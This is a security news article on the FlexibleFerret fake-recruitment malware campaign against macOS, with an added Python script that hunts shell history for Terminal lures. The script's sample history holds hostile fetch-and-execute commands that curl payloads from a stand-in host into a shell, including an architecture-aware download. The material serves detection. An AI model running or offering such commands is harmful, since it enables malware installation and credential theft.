According to Dark Reading, the North Korea-linked hackers behind the FlexibleFerret malware family are refining their credential-theft campaign against macOS users, which runs through fake job recruitment workflows. The threat actors use increasingly convincing recruitment lures that trick users into executing malicious commands in Terminal, sidestepping built-in protections like Gatekeeper rather than defeating them. Recent analysis by Jamf Threat Labs shows the campaign now features architecture-aware logic that serves separate payloads for Intel and Apple silicon Macs, decoy applications, and improved persistence mechanisms. The operation, known as “Contagious Interview,” walks targets through hiring steps that eventually lead them to execute malware; one example domain, evaluza dot com, mimics legitimate hiring assessment portals.
Social Engineering Perfected
Here’s what makes this campaign particularly clever: they’re not just sending malware attachments. They’re building entire fake hiring workflows that feel completely legitimate. The threat actors stand up assessment portals that dynamically select job titles and company names from predefined lists, so every visitor gets what appears to be a personalized experience. The fake sites then ask users to complete video introductions or similar tasks before requesting they run a Terminal command to “fix” nonexistent camera or microphone issues. And honestly, if you’re desperate for a job in this economy, how many people would question running what looks like a technical fix?
Bypassing Apple’s Defenses
The real genius here is how they’re getting around macOS security. Instead of trying to break through Gatekeeper or other protections, they’re convincing users to manually paste curl commands directly into Terminal. That matters because Gatekeeper only evaluates files carrying the com.apple.quarantine attribute, which browsers set on downloads; content fetched with curl and piped straight into a shell never gets that attribute, so Gatekeeper never sees it. Once the command runs, the script detects whether the machine is Intel or Apple silicon and fetches the matching payload. They’ve even started using signed decoy applications like MediaPatcher.app that pop up fake macOS-style permission requests. In the background, the malicious app collects credentials and exfiltrates them to Dropbox accounts. Basically, they’re turning users into their own malware installers.
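Because the initial foothold is a command the victim types rather than a file Gatekeeper inspects, the most useful hunting artifact is shell history and process command lines. The script below is an added example written for this page, not code from Jamf, Dark Reading or the campaign itself: it parses zsh extended-history lines, flags fetch-and-execute patterns (a curl or wget pipeline into a shell, or a shell invoked on the output of curl) and flags commands that branch on the machine architecture before fetching, which is the behaviour the text describes. The history lines and the assessment.example host are constructed for illustration; in practice you would feed ~/.zsh_history or EDR process-creation events through the same function.

```python
"""Hunt shell history for Terminal fetch-and-execute lures.

Added example for this article; the sample history and the
assessment.example host are constructed, not captured from an infection.
"""
import re
from typing import Dict, List

# Tools that pull remote content.
FETCHERS = re.compile(r"\b(?:curl|wget)\b")
# Remote content piped straight into an interpreter: curl ... | bash
PIPE_TO_SHELL = re.compile(r"\|\s*(?:sudo\s+)?(?:ba|z)?sh\b")
# Remote content executed via command substitution: bash -c "$(curl ...)"
INLINE_EXEC = re.compile(r"\b(?:ba|z)?sh\s+-c\s+[\"']?\$\((?:curl|wget)\b")
# Architecture selection lets one lure serve Intel and Apple silicon Macs.
ARCH_SWITCH = re.compile(r"uname\s+-m|\barch\b|\barm64\b|\bx86_64\b")

# zsh extended history: ": <epoch>:<elapsed>;<command>"
ZSH_EXTENDED = re.compile(r"^: \d+:\d+;(.*)$")

# Constructed sample history; the third, fourth and fifth lines are lures.
SAMPLE_HISTORY = [
    ": 1731000000:0;ls -la ~/Downloads",
    ": 1731000010:0;brew install jq",
    ": 1731000020:0;curl -fsSL https://assessment.example/fix-camera.sh | bash",
    ": 1731000030:0;zsh -c \"$(curl -fsSL https://assessment.example/setup.sh)\"",
    ": 1731000040:0;[ \"$(uname -m)\" = arm64 ] && curl -sO https://assessment.example/p_arm64 || curl -sO https://assessment.example/p_x86_64",
    ": 1731000050:0;git pull --rebase",
]


def strip_history_prefix(line: str) -> str:
    """Return the bare command from a zsh extended-history line (or the line itself)."""
    m = ZSH_EXTENDED.match(line)
    return m.group(1) if m else line


def classify(cmd: str) -> List[str]:
    """Tag a single command with the lure behaviours it exhibits."""
    tags: List[str] = []
    fetches = bool(FETCHERS.search(cmd))
    if fetches and (PIPE_TO_SHELL.search(cmd) or INLINE_EXEC.search(cmd)):
        tags.append("fetch-and-execute")
    if fetches and ARCH_SWITCH.search(cmd):
        tags.append("arch-aware-fetch")
    return tags


def scan_history(lines: List[str]) -> List[Dict[str, object]]:
    """Return one finding per history line that matches at least one pattern."""
    findings: List[Dict[str, object]] = []
    for n, line in enumerate(lines, 1):
        cmd = strip_history_prefix(line.rstrip("\n"))
        tags = classify(cmd)
        if tags:
            findings.append({"line": n, "command": cmd, "tags": tags})
    return findings


if __name__ == "__main__":
    for f in scan_history(SAMPLE_HISTORY):
        print(f"line {f['line']}: {', '.join(f['tags'])}\n    {f['command']}")
```

Run against a real history file with `scan_history(open(os.path.expanduser("~/.zsh_history"), errors="replace").readlines())`. The patterns are deliberately broad: a Homebrew install line will trip the fetch-and-execute rule too, so treat hits as triage leads to pair with the domain, the surrounding timeline and any new LaunchAgent, not as verdicts.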
Why This Matters
This isn’t just another malware campaign – it’s a sophisticated operation that shows how threat actors are evolving beyond traditional attack methods. The final payload is a Go-based backdoor that handles more commands than previous versions, including collecting system information, uploading and downloading files, harvesting browser data, and extracting keychain information. And while this targets macOS users specifically, the social engineering tactics could easily be adapted for any platform: the weak point being exploited is not the operating system but the user’s willingness to run a command they were told would fix a problem.
What’s Next
Look, this campaign isn’t going away. As Jamf’s analysis shows, the threat actors are continuously refining their approach. The fact that they’re now using architecture-aware payloads and signed decoy applications means they’re investing serious resources into this operation. Previous research from SentinelOne and Validin has consistently shown these actors adapting and improving. So what’s the takeaway? Treat any unsolicited interview assessments and Terminal-based “fix” instructions as high risk; no legitimate hiring assessment needs you to paste a curl command into a shell. Because in today’s threat landscape, your next job opportunity might just be malware in disguise.
